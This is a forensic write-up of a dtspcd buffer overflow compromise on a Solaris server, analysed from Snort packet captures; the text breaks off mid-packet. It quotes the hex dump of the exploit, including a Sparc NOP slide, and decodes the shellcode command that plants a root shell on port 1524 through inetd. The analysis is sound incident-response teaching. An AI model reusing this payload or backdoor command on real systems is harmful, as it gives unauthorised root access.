assertNoHeader, statusIs, bodyEquals, bodyContains, htmlAllContain, htmlCount, -- * Utils for debugging tests printBody, printMatches, -- * Utils for building your own assertions -- | Please consider generalizing and contributing the assertions you write. htmlQuery, parseHTML, withResponse ) where import qualified Test.Hspec.Core as Core import qualified Test.Hspec.Runner as Runner import qualified Data.List as DL import qualified Data.Maybe as DY import qualified Data.ByteString.Char8 as BS8 import qualified Data.Text as T import qualified Data.Text.Encoding as TE import qualified Data.ByteString.Lazy.Char8 as BSL8 import qualified Test.HUnit as HUnit import qualified Test.Hspec.HUnit () import qualified Network.HTTP.Types as H import qualified Network.Socket.Internal as Sock import Data.CaseInsensitive (CI) import Text.XML.HXT.Core hiding (app, err) import Network.Wai import Network.Wai.Test hiding (assertHeader, assertNoHeader) import qualified Control.Monad.Trans.State as ST import Control.Monad.IO.Class import System.IO import Yesod.Test.TransversingCSS import Database.Persist.GenericSql import Data.Monoid (mappend) import qualified Data.Text.Lazy as TL import Data.Text.Lazy.Encoding (encodeUtf8, decodeUtf8) -- | The state used in 'describe' to build a list of specs data SpecsData = SpecsData Application ConnectionPool [Core.Spec Core.AnyExample] -- | The specs state monad is where 'describe' runs. type Specs = ST.StateT SpecsData IO () -- | The state used in a single test case defined using 'it' data OneSpecData = OneSpecData Application ConnectionPool CookieValue (Maybe SResponse) -- | The OneSpec state monad is where 'it' runs. type OneSpec = ST.StateT OneSpecData IO data RequestBuilderData = RequestBuilderData [RequestPart] (Maybe SResponse) -- | Request parts let us discern regular key/values from files sent in the request. data RequestPart = ReqPlainPart String String | ReqFilePart String FilePath BSL8.ByteString String -- | The RequestBuilder state monad constructs an url encoded string of arguments -- to send with your requests. Some of the functions that run on it use the current -- response to analize the forms that the server is expecting to receive. type RequestBuilder = ST.StateT RequestBuilderData IO -- | Both the OneSpec and RequestBuilder monads hold a response that can be analized, -- by making them instances of this class we can have general methods that work on -- the last received response. class HoldsResponse a where readResponse :: a -> Maybe SResponse instance HoldsResponse OneSpecData where readResponse (OneSpecData _ _ _ x) = x instance HoldsResponse RequestBuilderData where readResponse (RequestBuilderData _ x) = x type CookieValue = H.Ascii -- | Runs your test suite, using you wai 'Application' and 'ConnectionPool' for performing -- the database queries in your tests. -- -- You application may already have your connection pool but you need to pass another one -- separately here. -- -- Look at the examples directory on this package to get an idea of the (small) amount of -- boilerplate code you'll need to write before calling this. runTests :: Application -> ConnectionPool -> Specs -> IO a runTests app connection specsDef = do (SpecsData _ _ specs) <- ST.execStateT specsDef (SpecsData app connection []) Runner.hspecX specs -- | Start describing a Tests suite keeping cookies and a reference to the tested 'Application' -- and 'ConnectionPool' describe :: String -> Specs -> Specs describe label action = do sData <- ST.get SpecsData app conn specs <- liftIO $ ST.execStateT action sData ST.put $ SpecsData app conn [Core.describe label specs] -- | Describe a single test that keeps cookies, and a reference to the last response. it :: String -> OneSpec () -> Specs it label action = do SpecsData app conn specs <- ST.get let spec = Core.it label $ do _ <- ST.execStateT action $ OneSpecData app conn "" Nothing return () ST.put $ SpecsData app conn $ spec : specs -- Performs a given action using the last response. Use this to create -- response-level assertions withResponse :: HoldsResponse a => (SResponse -> ST.StateT a IO b) -> ST.StateT a IO b withResponse f = maybe err f =<< fmap readResponse ST.get where err = failure "There was no response, you should make a request" -- | Use HXT to parse a value from an html tag. -- Check for usage examples in this module's source. parseHTML :: Html -> LA XmlTree a -> [a] parseHTML html p = runLA (hread >>> p ) (TL.unpack $ decodeUtf8 html) -- | Query the last response using css selectors, returns a list of matched fragments htmlQuery :: HoldsResponse a => Query -> ST.StateT a IO [Html] htmlQuery query = withResponse $ \ res -> case findBySelector (simpleBody res) query of Left err -> failure $ T.unpack query ++ " did not parse: " ++ (show err) Right matches -> return $ map (encodeUtf8 . TL.pack) matches -- | Asserts that the two given values are equal. assertEqual :: (Eq a) => String -> a -> a -> OneSpec () assertEqual msg a b = liftIO $ HUnit.assertBool msg (a == b) -- | Assert the last response status is as expected. statusIs :: HoldsResponse a => Int -> ST.StateT a IO () statusIs number = withResponse $ \ SResponse { simpleStatus = s } -> liftIO $ flip HUnit.assertBool (H.statusCode s == number) $ concat [ "Expected status was ", show number , " but received status was ", show $ H.statusCode s ] -- | Assert the given header key/value pair was returned. assertHeader :: HoldsResponse a => CI BS8.ByteString -> BS8.ByteString -> ST.StateT a IO () assertHeader header value = withResponse $ \ SResponse { simpleHeaders = h } -> case lookup header h of Nothing -> failure $ concat [ "Expected header " , show header , " to be " , show value , ", but it was not present" ] Just value' -> liftIO $ flip HUnit.assertBool (value == value') $ concat [ "Expected header " , show header , " to be " , show value , ", but received " , show value' ] -- | Assert the given header was not included in the response. assertNoHeader :: HoldsResponse a => CI BS8.ByteString -> ST.StateT a IO () assertNoHeader header = withResponse $ \ SResponse { simpleHeaders = h } -> case lookup header h of Nothing -> return () Just s -> failure $ concat [ "Unexpected header " , show header , " containing " , show s ] -- | Assert the last response is exactly equal to the given text. This is -- useful for testing API responses. bodyEquals :: HoldsResponse a => String -> ST.StateT a IO () bodyEquals text = withResponse $ \ res -> liftIO $ HUnit.assertBool ("Expected body to equal " ++ text) $ (simpleBody res) == BSL8.pack text -- | Assert the last response has the given text. The check is performed using the response -- body in full text form. bodyContains :: HoldsResponse a => String -> ST.StateT a IO () bodyContains text = withResponse $ \ res -> liftIO $ HUnit.assertBool ("Expected body to contain " ++ text) $ (simpleBody res) `contains` text contains :: BSL8.ByteString -> String -> Bool contains a b = DL.isInfixOf b (BSL8.unpack a) -- | Queries the html using a css selector, and all matched elements must contain -- the given string. htmlAllContain :: HoldsResponse a => Query -> String -> ST.StateT a IO () htmlAllContain query search = do matches <- htmlQuery query case matches of [] -> failure $ "Nothing matched css query: "++T.unpack query _ -> liftIO $ HUnit.assertBool ("Not all "++T.unpack query++" contain "++search) $ DL.all (DL.isInfixOf search) (map (TL.unpack . decodeUtf8) matches) -- | Performs a css query on the last response and asserts the matched elements -- are as many as expected. htmlCount :: HoldsResponse a => Query -> Int -> ST.StateT a IO () htmlCount query count = do matches <- fmap DL.length $ htmlQuery query liftIO $ flip HUnit.assertBool (matches == count) ("Expected "++(show count)++" elements to match "++T.unpack query++", found "++(show matches)) -- | Outputs the last response body to stderr (So it doesn't get captured by HSpec) printBody :: HoldsResponse a => ST.StateT a IO () printBody = withResponse $ \ SResponse { simpleBody = b } -> liftIO $ hPutStrLn stderr $ BSL8.unpack b -- | Performs a CSS query and print the matches to stderr. printMatches :: HoldsResponse a => Query -> ST.StateT a IO () printMatches query = do matches <- htmlQuery query liftIO $ hPutStrLn stderr $ show matches -- | Add a parameter with the given name and value. byName :: String -> String -> RequestBuilder () byName name value = do RequestBuilderData parts r <- ST.get ST.put $ RequestBuilderData ((ReqPlainPart name value):parts) r -- | Add a file to be posted with the current request -- -- Adding a file will automatically change your request content-type to be multipart/form-data fileByName :: String -> FilePath -> String -> RequestBuilder () fileByName name path mimetype = do RequestBuilderData parts r <- ST.get contents <- liftIO $ BSL8.readFile path ST.put $ RequestBuilderData ((ReqFilePart name path contents mimetype):parts) r -- This looks up the name of a field based on the contents of the label pointing to it. nameFromLabel :: String -> RequestBuilder String nameFromLabel label = withResponse $ \ res -> do let body = simpleBody res escaped = escapeHtmlEntities label mfor = parseHTML body $ deep $ hasName "label" >>> filterA (xshow this >>> mkText >>> hasText (DL.isInfixOf escaped)) >>> getAttrValue "for" case mfor of for:[] -> do let mname = parseHTML body $ deep $ hasAttrValue "id" (==for) >>> getAttrValue "name" case mname of "":_ -> failure $ "Label "++label++" resolved to id "++for++" which was not found. " name:_ -> return name _ -> failure $ "More than one input with id " ++ for [] -> failure $ "No label contained: "++label _ -> failure $ "More than one label contained "++label -- | Escape HTML entities in a string, so you can write the text you want in -- label lookups without worrying about the fact that yesod escapes some characters. escapeHtmlEntities :: String -> String escapeHtmlEntities "" = "" escapeHtmlEntities (c:cs) = case c of '<' -> '&' : 'l' : 't' : ';' : escapeHtmlEntities cs '>' -> '&' : 'g' : 't' : ';' : escapeHtmlEntities cs '&' -> '&' : 'a' : 'm' : 'p' : ';' : escapeHtmlEntities cs '"' -> '&' : 'q' : 'u' : 'o' : 't' : ';' : escapeHtmlEntities cs '\'' -> '&' : '#' : '3' : '9' : ';' : escapeHtmlEntities cs x -> x : escapeHtmlEntities cs byLabel :: String -> String -> RequestBuilder () byLabel label value = do name <- nameFromLabel label byName name value fileByLabel :: String -> FilePath -> String -> RequestBuilder () fileByLabel label path mime = do name <- nameFromLabel label fileByName name path mime -- | Lookup a _nonce form field and add it's value to the params. -- Receives a CSS selector that should resolve to the form element containing the nonce. addNonce_ :: Query -> RequestBuilder () addNonce_ scope = do matches <- htmlQuery $ scope `mappend` "input[name=_token][type=hidden][value]" case matches of [] -> failure $ "No nonce found in the current page" element:[] -> byName "_token" $ head $ parseHTML element $ getAttrValue "value" _ -> failure $ "More than one nonce found in the page" -- | For responses that display a single form, just lookup the only nonce available. addNonce :: RequestBuilder () addNonce = addNonce_ "" -- | Perform a POST request to url, using params post :: BS8.ByteString -> RequestBuilder () -> OneSpec () post url paramsBuild = do doRequest "POST" url paramsBuild -- | Perform a POST request without params post_ :: BS8.ByteString -> OneSpec () post_ = flip post $ return () -- | Perform a GET request to url, using params get :: BS8.ByteString -> RequestBuilder () -> OneSpec () get url paramsBuild = doRequest "GET" url paramsBuild -- | Perform a GET request without params get_ :: BS8.ByteString -> OneSpec () get_ = flip get $ return () -- | General interface to performing requests, letting you specify the request method and extra headers. doRequest :: H.Method -> BS8.ByteString -> RequestBuilder a -> OneSpec () doRequest method url paramsBuild = do OneSpecData app conn cookie mRes <- ST.get RequestBuilderData parts _ <- liftIO $ ST.execStateT paramsBuild $ RequestBuilderData [] mRes let req = if DL.any isFile parts then makeMultipart cookie parts else makeSinglepart cookie parts response <- liftIO $ runSession (srequest req) app let cookie' = DY.fromMaybe cookie $ fmap snd $ DL.find (("Set-Cookie"==) . fst) $ simpleHeaders response ST.put $ OneSpecData app conn cookie' (Just response) where isFile (ReqFilePart _ _ _ _) = True isFile _ = False -- For building the multi-part requests boundary :: String boundary = "*******noneedtomakethisrandom" separator = BS8.concat ["--", BS8.pack boundary, "\r\n"] makeMultipart cookie parts = flip SRequest (BSL8.fromChunks [multiPartBody parts]) $ mkRequest [ ("Cookie", cookie) , ("Content-Type", BS8.pack $ "multipart/form-data; boundary=" ++ boundary)] multiPartBody parts = BS8.concat $ separator : [BS8.concat [multipartPart p, separator] | p <- parts] multipartPart (ReqPlainPart k v) = BS8.concat [ "Content-Disposition: form-data; " , "name=\"", (BS8.pack k), "\"\r\n\r\n" , (BS8.pack v), "\r\n"] multipartPart (ReqFilePart k v bytes mime) = BS8.concat [ "Content-Disposition: form-data; " , "name=\"", BS8.pack k, "\"; " , "filename=\"", BS8.pack v, "\"\r\n" , "Content-Type: ", BS8.pack mime, "\r\n\r\n" , BS8.concat $ BSL8.toChunks bytes, "\r\n"] -- For building the regular non-multipart requests makeSinglepart cookie parts = SRequest (mkRequest [("Cookie",cookie), ("Content-Type", "application/x-www-form-urlencoded")]) $ BSL8.pack $ DL.concat $ DL.intersperse "&" $ map singlepartPart parts singlepartPart (ReqFilePart _ _ _ _) = "" singlepartPart (ReqPlainPart k v) = concat [k,"=",v] -- General request making mkRequest headers = defaultRequest { requestMethod = method , remoteHost = Sock.SockAddrInet 1 2 , requestHeaders = headers , rawPathInfo = url , pathInfo = DL.filter (/="") $ T.split (== '/') $ TE.decodeUtf8 url } -- | Run a persistent db query. For asserting on the results of performed actions -- or setting up pre-conditions. At the moment this part is still very raw. runDB :: SqlPersist IO a -> OneSpec a runDB query = do OneSpecData _ pool _ _ <- ST.get liftIO $ runSqlPool query pool -- Yes, just a shortcut failure :: (MonadIO a) => String -> a b failure reason = (liftIO $ HUnit.assertFailure reason) >> error ""
http://hackage.haskell.org/package/yesod-test-0.2.0.5/docs/src/Yesod-Test.html
CC-MAIN-2014-35
refinedweb
2,254
50.02
lp:~kevinoid/duplicity/windows-port A branch for development work porting Duplicity to run natively on Windows. - Get this branch: - bzr branch lp:~kevinoid/duplicity/windows-port Branch merges - duplicity-team: Pending requested 2010-10-25 - Diff: 1552 lines (+668/-245)18 files modifieddist/makedist (+58/-35) dist/setup.py (+9/-10) duplicity-bin (+96/-17) duplicity.1 (+5/-3) duplicity/GnuPGInterface.py (+215/-127) duplicity/backend.py (+14/-1) duplicity/backends/localbackend.py (+10/-1) duplicity/commandline.py (+14/-1) duplicity/compilec.py (+16/-3) duplicity/dup_temp.py (+9/-5) duplicity/globals.py (+48/-5) duplicity/manifest.py (+9/-3) duplicity/patchdir.py (+15/-0) duplicity/path.py (+102/-17) duplicity/selection.py (+21/-11) duplicity/tarfile.py (+6/-2) po/update-pot (+0/-4) po/update-pot.py (+21/-0) Related bugs Related blueprints Branch information - Owner: - Kevin Locke - Status: - Mature Recent revisions - 703. By Kevin Locke <email address hidden> on 2010-10-25 Include updates to GnuPGInterface These updates are from the current state of a branch of development that I created to port GnuPGInterface to Windows, fix some bugs, and add Python 3 support. The branch is available on github at <http:// github. com/kevinoid/ py-gnupg>. These changes are taken from commit 91667c. I have assurances from the original author of GnuPGInterface that the changes will be merged into his sources with minimal changes (if any) once he has time and that it is safe to merge these changes into other projects that need them without introducing a significant maintenance burden. Note: This version of GnuPGInterface now uses subprocess rather than "raw" fork/exec. The threaded waitpid was removed due to threading issues with subprocess (particularly Issue 1731717). It should be largely unnecessary as any zombie child processes are reaped when a new subprocess is started. If the more immediate reaping is required, the threaded wait can easily be re-added (and less-easily be made thread safe with subprocess). Signed-off-by: Kevin Locke <email address hidden> - 702. By Kevin Locke <email address hidden> on 2010-10-25 Unwrap temporary file instances tempfile. TemporaryFile returns an instance of a wrapper class on non-POSIX, non-Cygwin systems. Yet the librsync code requires a standard file object. On Windows, the wrapper is unnecessary since the file is opened with O_TEMPORARY and is deleted automatically on close. On other systems the wrapper may be necessary to delete a file, so we error out (in a way that future developers on those systems should be able to find and understand...). Note: This is a bit of a hack and relies on undocumented properties of the object returned from tempfile. TemporaryFile. However, it avoids the need to track and delete the temporary file ourselves. Signed-off-by: Kevin Locke <email address hidden> - 701. By Kevin Locke <email address hidden> on 2010-10-25 Make the manifest format more interoperable At the cost of losing a bit of information, use the POSIX path and EOL convention as part of the file format for manifest files. This way backups created on one platform can be restored on another with a different path and/or EOL convention. To accomplish this, change the file mode to binary and convert native paths to POSIX paths during manifest creation and back during load. Note: During load the drive specifier for the target directory (if there is one) is added to the POSIX-converted path. This allows restoring cross-platform files more easily at the cost of losing a warning about restoring files to a different drive than the original backup. If this is unacceptable, the drive could be the first component of the POSIX path or the cross-platform interoperability could be dropped. Signed-off-by: Kevin Locke <email address hidden> - 700. By Kevin Locke <email address hidden> on 2010-10-25 Prevent Windows paths from being parsed as URLs Windows paths which begin with a drive specifier are parsed as having a scheme which is the drive letter. In order to avoid against these paths being treated as URLs, check if the potential url_string looks like a Windows path. Note: The regex is not perfect, since it is possible that the "c" URL scheme would not require slashes after the protocol. So limit the checks to Windows platforms where paths are more likely to have this form. Signed-off-by: Kevin Locke <email address hidden> - 699. By Kevin Locke <email address hidden> on 2010-10-25 Make file:// URL parsing more portable Create path.from_url_path utility function which takes the path component of a file URL and converts it into the native path representation on the platform. Note: RFC 1738 specifies that anything after file:// before the next slash is a hostname (and therefore, implicitly, all paths are absolute). However, to maintain backwards compatibility, allow for relative paths to be specified in this manner. Signed-off-by: Kevin Locke <email address hidden> - 698. By Kevin Locke <email address hidden> on 2010-10-25 Ensure prefix ends with empty path component WARNING: Functionality change In order to prevent the given prefix from matching directories which begin with the last component of prefix, ensure that prefix ends with an empty path component (causing a tailing slash on POSIX systems). Otherwise the prefix /foo/b would also include /foo/bar. Note: If this functionality really was intended, wherever prefix is removed from a path, the result should not start with a directory separator (since it would result in a "/" first element in the return value from path.split_all). Signed-off-by: Kevin Locke <email address hidden> - 697. By Kevin Locke <email address hidden> on 2010-10-25 Replace path manipulation based on "/" Make use of path.split_all and os.path.join where paths were manipulated based on "/" In selection, change path import to keep path namespace, but alias path.Path to Path to minimize the diff. The bare uses of split_all seemed unnecessarily confusing and the other members of path are not used directly so there is no real need for the * import. Note: Removed unnecessary use of filter to remove blanks as this is handled implicitly by os.path.split and therefore by path.split_all. Note2: Need to be careful that os.path.join must have at least 1 argument, while "/".join() could work on a 0-length array. Signed-off-by: Kevin Locke <email address hidden> - 696. By Kevin Locke <email address hidden> on 2010-10-25 Create split_all utility function in path This function is intended to replace the pathstr.split("/") idiom in many places and provides a convenient way to break an arbitrary path into its constituent components. Note: Although it would be possible to split on os.altsep and os.sep and it would work in many cases, and run a bit faster, it doesn't handle more complex path systems and is likely to fail in corner cases even in less complex path systems. Signed-off-by: Kevin Locke <email address hidden> - 695. By Kevin Locke <email address hidden> on 2010-10-25 Support systems without pwd and/or grp in tarfile Inside tarfile this case is normally checked by the calling code, but since uid2uname and gid2gname are called by Path without checking for pwd and grp (and we want to support this case), remove the assertion that these modules are defined. When they are not, throw KeyError indicating the ID could not be mapped. Signed-off-by: Kevin Locke <email address hidden> - 694. By Kevin Locke <email address hidden> on 2010-10-25 Support more path systems in glob->regex conversion - Match against the system path separators, rather than "/" - Update duplicity.1 man page to indicate that the metacharacters match against the directory separator, rather than "/" Note: This won't be portable to systems with more complex path systems (like VMS), but that case is not trivial so it is worth waiting for a need to arise. Signed-off-by: Kevin Locke <email address hidden> Branch metadata - Branch format: - Branch format 7 - Repository format: - Bazaar repository format 2a (needs bzr 1.16 or later) - Stacked on: - lp:duplicity/0.7-series
https://code.launchpad.net/~kevinoid/duplicity/windows-port
CC-MAIN-2018-26
refinedweb
1,353
55.95
The WGAN paper shows some fairly compelling theory and empirical evidence that their approach is strictly superior. Lesson 10 Discussion Why do some images end up with floats as pixel values instead of uint8? I’m trying to find a way to type .astype("uint8") less. Apologies if this has been posted before, but one resource I’ve found particularly useful in trying to understand how and why the Wasserstein GAN fixes the problems of normal GANs is this r/Machinelearning thread , wherein you can see the original author of the paper discussing it and answering questions about it. One particularly valuable framing for me, posted by the author, was: There are two elements that make the transition to the Wasserstein distance. Taking out the sigmoid in the discriminator, and the difference between the means (equation 2). While it’s super simple in the end, and looks quite similar to a normal GAN, there are some fundamental differences. The outputs are no longer probabilities, and the loss now has nothing to do with classification. The critic now is just a function that tries to have (in expectation) low values in the fake data, and high values in the real data. If it can’t, it’s because the two distributions are indeed similar. The weight clipping. This constraints how fast the critic can grow. If two samples are close, therefore the critic will have no option than to have values that are close for them. In a normal GAN, if you train the discriminator well, it will learn to put a 0 on fake and a 1 on real, regardless of how close they are, as long as their not the same point. In the end, the flavor in here is much more ‘geometric’ than ‘probabilistic’, as before. It’s not of differentiating real from fake. It’s about having high values on real, and low values on fake. Since how much you can grow is constrained by the clipping, as samples get closer this difference will shrink. This is much more related to the concept of ‘distance’ between samples, than to the probability of being from one distribution or the other. I tried out WGAN on ~11K dog images from cats/dogs redux. Perhaps it’s because i don’t have enough time to train, i.e. 5 weeks, but the results weren’t so hot… Anyone looking for a “quick turnaround” with WGAN may be disappointed. The generator loss bounced around a TON during training, but did seem to continually go down, little by little. I held the learning rate constant at .0001. After 10 epochs (~3 mins) Loss_D: -1.547441 Loss_G: 0.754658 Loss_D_real: -0.807306 Loss_D_fake 0.740135 After 250 epochs (~1 hour) Loss_D: -0.2407 Loss_G: 0.10603 Loss_D_real: -.004035 Loss_D_fake 0.2367 After 2300 epochs (~8 hours): Loss_D: -0.080403 Loss_G: -0.134346 Loss_D_real: -0.385072 Loss_D_fake -0.304669 Actual doggy images: Some questions I’m pondering: - How do we know WGANs aren’t regenerating the same images from the training set? Is there an easy way to confirm this is “new” content? - What is the max size of images we can realistically generate? The images above are very small. - How long would this take to train on the 3M LSUN images running on 1 fast GPU? - Can we do transfer learning with WGAN to speed things up? - What do the negative loss values above represent? Most generative model papers show a way to do this - take a look and GAN, DCGAN, and WGAN, and tell us what you find! Overall, I think your expectations may be too high… There’s too many different kinds of dogs I think, and also our eyes are good at recognizing things that look like real animals. I think of WGAN as being something we should add on top of other generative models (like style transfer, colorization, etc). Anyone had luck with training the DCGAN with MNIST data set? I saw some examples on the web where folks used DCGAN and got pretty compelling results using DCGAN. I tried DCGAN but below are the images I have to date. wondering how far we can push DCGAN to get better results? @rodgzilla and I were wondering the same thing. I created a way to check MNIST images using MSE and the results seem reasonably accurate. You may need to customize it for multiple channels etc, I just flattened the images. here is the code Hi @kelvin @jeremy I am not sure I follow how the classids.txt file is being generated. In the original notebook the code is classid_lines = open(path+'/../classids.txt', 'r').readlines() Which means it was expecting the file to be there. Was the file available in platform.ai/files ? Ok… I am running into another issue in this notebook. What was the mid_out.output_shape and rn_top_avg.output_shape you got? I am getting (None, 14, 14, 1024) and (None, 2, 2, 1024) Then I am getting this error for gen_features_mid(1) ValueError: Error when checking : expected input_4 to have shape (None, 224, 224, 3) but got array with shape (128, 72, 72, 3) Any ideas what I am missing? Is this notebook compiled against theano by any chance? Just looking at summary of my model - The dimensions dont look right. 1,1, 512? res5a_branch2a (Convolution2D) (None, 1, 1, 512) 524800 activation_321[0][0] bn5a_branch2a (BatchNormalizatio (None, 1, 1, 512) 2048 res5a_branch2a[0][0] activation_322 (Activation) (None, 1, 1, 512) 0 bn5a_branch2a[0][0] res5a_branch2b (Convolution2D) (None, 1, 1, 512) 2359808 activation_322[0][0] I think I found the issue - new_s should be 224 not 72 as in the notebook. This worked for me from gensim.models import word2vec, KeyedVectors <-- not sure I need the last import!! model = word2vec.KeyedVectors.load_word2vec_format(w2v_path+'.bin', binary=True) In imagenet_process.ipynb, I wrote some code below. d = np.array(resize_img(0)) # c = np.zeros_like(d) c = np.zeros(d.shape) c[:] = d plt.imshow(c) When I use np.zeros_like, image display like this When I use np.zeros, image display like this. It’s confusing. wow, the 2nd one seems to be an “X-rays” version of the 1st image! A quick search only brings up the differences in memory allocation between np.zeros and np.zeros_like, but clearly this results indicate more differences than that. How long should it take the wgan pytorch to train on the cifar10 dataset with 200 epochs and Titan X GPU? I ran the code but it doesn’t seem to be using all of the GPU memory. Also, where can I download the LSUN dataset? Thanks all. Hi all, I was going through the imagenet_process.ipynb and noticed that each time we append resized image to arr, the size of arr is increased.Only after collecting all resized images in arr, we are writing it to hard disk.This maynot be feasible for resizing entire imagenet because of limited RAM. Has anyone figured out how to write in batches ? Thank You Maybe the content layers’ choices problem? The original paper suggested using the conv3_3, but I saw many other implementations are using more than just one layer, just give these layers different weights, maybe it would help (I haven’t tried that yet, but I’m about to get there). Hi @brendan, I’m having same issues. I was able to get speedups similar to that mentioned in docs.But when I try resizing sample imagenet I am getting similar runtimes for both pillow and pillow-simd. Have you figured it out ? Thank you UPDATE: I found out that the variable arr isn’t actually stored in RAM. But it behaves like it is in RAM.When you do arr.shape it prints out the shape(i.e 1millionx224x224x3), and when you try to display a random image it will display.It only accesses the image when called upon i.e lazy evaluation. You can resize entire imagenet. threading.local seems almost magical. @jeremy @rachel The authors of the DCGAN paper tell that they scaled the images to a range of [-1, 1] and used tanh as the activation function in the last layer of the generator. Also use the alpha(slope) of LeakyRelu as 0.2. So I did these things and got rid of the first Dense layer in the discriminator as the authors tell to eliminate the fully connected(Dense) layers. Then I trained the model for 50 epochs. Each epoch takes around 35 secs on a Tesla K80. Look at the results that I got. Code for this. By the way, Mendeley desktop is awesome. Thanks for suggesting it
https://forums.fast.ai/t/lesson-10-discussion/1807?page=5
CC-MAIN-2018-51
refinedweb
1,441
76.01
An attacker has compromised a Sun Solaris server on a production network using an exploit for the dtspcd service in CDE; a Motif-based graphical user environment for Unix systems. You are the senior security engineer of the Security Operations Center (SOC) for your company and are required to find out how the box was compromised and by whom. Using only a Snort binary capture file from the remote log server, you are to conduct a complete analysis of all IDS captures, log files, and an inspection of the file system. This paper will deconstruct the steps taken to conduct a full analysis of a compromised machine. In particular, we will be examining the tool that was used to exploit a dtspcd buffer overflow vulnerability, which allows remote root access to the system. The objective of this paper is to show the value of IDS logs in conducting forensics investigations. Analyzing the Logs The following section will discuss the methods and techniques used in analysing and assessing the problem at hand. This investigation will use a Snort binary file was generously provided by Lance Spitzner and the Honeynet Project. After downloading the Snort binary capture file to my workstation, I began work immediately. I first untarred the Snort logs and checked to see the type of file format they were captured in. -bash-2.05b$ tar -zxvf 0108@000-snort.log.tar.gz -bash-2.05b$ file 0108@000-snort.log tcpdump capture file (big-endian) - version 2.4 (Ethernet, capture length 1514) I skimmed the packets and immediately started to ascertain what had happened, which I will explain in detail below. 14:46:04.378306 adsl-61-1-160.dab.bellsouth.net.3592 > 172.16.1.102.6112: P 1:14 49(1448) ack 1 win 16060 <nop,nop,timestamp 463986683 4158792> (DF) 0x0000 4500 05dc a1ac 4000 3006 241c d03d 01a0 E.....@.0.$..=.. 0x0010 ac10 0166 ..@...@...@...@. 0x0070 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x0080 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x0090 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x00a0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x00b0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x00c0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x00d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x00e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x00f0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. [logs cut short due to repeated patterns] Something worth noting in this packet are the "@" symbols above; hexadecimal (0x801c4011) is NOP instruction code for the Sparc architecture. The more familiar NOP slide being 0x90, however, will only work on i386 machines. What exactly is a NOP slide? It's a means of padding the buffer in an exploit where it is not immediately known where code execution will begin. If the exploit points to any place in the NOP padding, the CPU will follow the NOP slide into the executable code. I then used tcpdump to output all the hex dumps of each packet sent to this specific destination IP into readable format. -bash-2.05b$ tcpdump -X -r 0108@000-snort.log host 172.16.1.102 Piecing together "The Big Picture" As I went down through the logs I found the packet responsible for executing code on the server: [beginning of packet removed due to NOP slides] 0x04d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x04e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. 0x04f0 20bf ffff 20bf ffff 7fff ffff 9003 e034 ...............4 0x0500 9223 e020 a202 200c a402 2010 c02a 2008 .#...........*.. 0x0510 c02a 200e d023 ffe0 e223 ffe4 e423 ffe8 .*...#...#...#.. 0x0520 c023 ffec 8210 200b 91d0 2008 2f62 696e .#........../bin 0x0530 2f6b 7368 2020 2020 2d63 2020 6563 686f /ksh....-c..echo 0x0540 2022 696e 6772 6573 6c6f 636b 2073 7472 ."ingreslock.str 0x0550 6561 6d20 7463 7020 6e6f 7761 6974 2072 eam.tcp.nowait.r 0x0560 6f6f 7420 2f62 696e 2f73 6820 7368 202d oot./bin/sh.sh.- 0x0570 6922 3e2f 746d 702f 783b 2f75 7372 2f73 i">/tmp/x;/usr/s 0x0580 6269 6e2f 696e 6574 6420 2d73 202f 746d bin/inetd.-s./tm 0x0590 702f 783b 736c 6565 7020 3130 3b2f 6269 p/x;sleep.10;/bi 0x05a0 6e2f 726d 202d 6620 2f74 6d70 2f78 2041 n/rm.-f./tmp/x.A 0x05b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0x05c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0x05d0 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAA Code executed: ./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x As we can see, the exploit makes use of the Korn shell by creating a file within the /tmp directory called "x". Within this file, it creates an inetd.conf style entry and starts the inet daemon, using the file "/tmp/x" as its configuration file. This spawns a root shell on the ingreslock port (1524/tcp). The ingreslock port has had a history of exploit shells bound to it, including, but not limited to, rpc.cmsd, statd, and tooltalk. As you can see, dtspcd is in good company. The first step in our analysis is complete. We have now discovered how the intruder managed to gain access to the system. We can now take a second look at the logs, taking in all relevant information regarding port 1524/tcp where the intruder is sure to have opened up some sort of raw connection (most likely telnet) to issue commands on the server. 14:46:18.398427 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: P 1:209(208) ack 1 win 16060 <nop,nop,timestamp 463988091 4160200> (DF) 0x0000 4500 0104 a1cc 4000 3006 28d4 d03d 01a0 E.....@.0.(..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 8025 5fbb 0117 ...f.......%_... 0x0020 8018 3ebc 5082 0000 0101 080a 1ba7 e57b ..>.P..........{ 0x0030 003f 7ac8 756e 616d 6520 2d61 3b6c 7320 .?z.uname.-a;ls. 0x0040 2d6c 202f 636f 7265 202f 7661 722f 6474 -l./core./var/dt 0x0050 2f74 6d70 2f44 5453 5043 442e 6c6f 673b /tmp/DTSPCD.log; 0x0060 5041 5448 3d2f 7573 722f 6c6f 6361 6c2f PATH=/usr/local/ 0x0070 6269 6e3a 2f75 7372 2f62 696e 3a2f 6269 bin:/usr/bin:/bi 0x0080 6e3a 2f75 7372 2f73 6269 6e3a 2f73 6269 n:/usr/sbin:/sbi 0x0090 6e3a 2f75 7372 2f63 6373 2f62 696e 3a2f n:/usr/ccs/bin:/ 0x00a0 7573 722f 676e 752f 6269 6e3b 6578 706f usr/gnu/bin;expo 0x00b0 7274 2050 4154 483b 6563 686f 2022 4244 rt.PATH;echo."BD 0x00c0 2050 4944 2873 293a 2022 6070 7320 2d66 .PID(s):."`ps.-f 0x00d0 6564 7c67 7265 7020 2720 2d73 202f 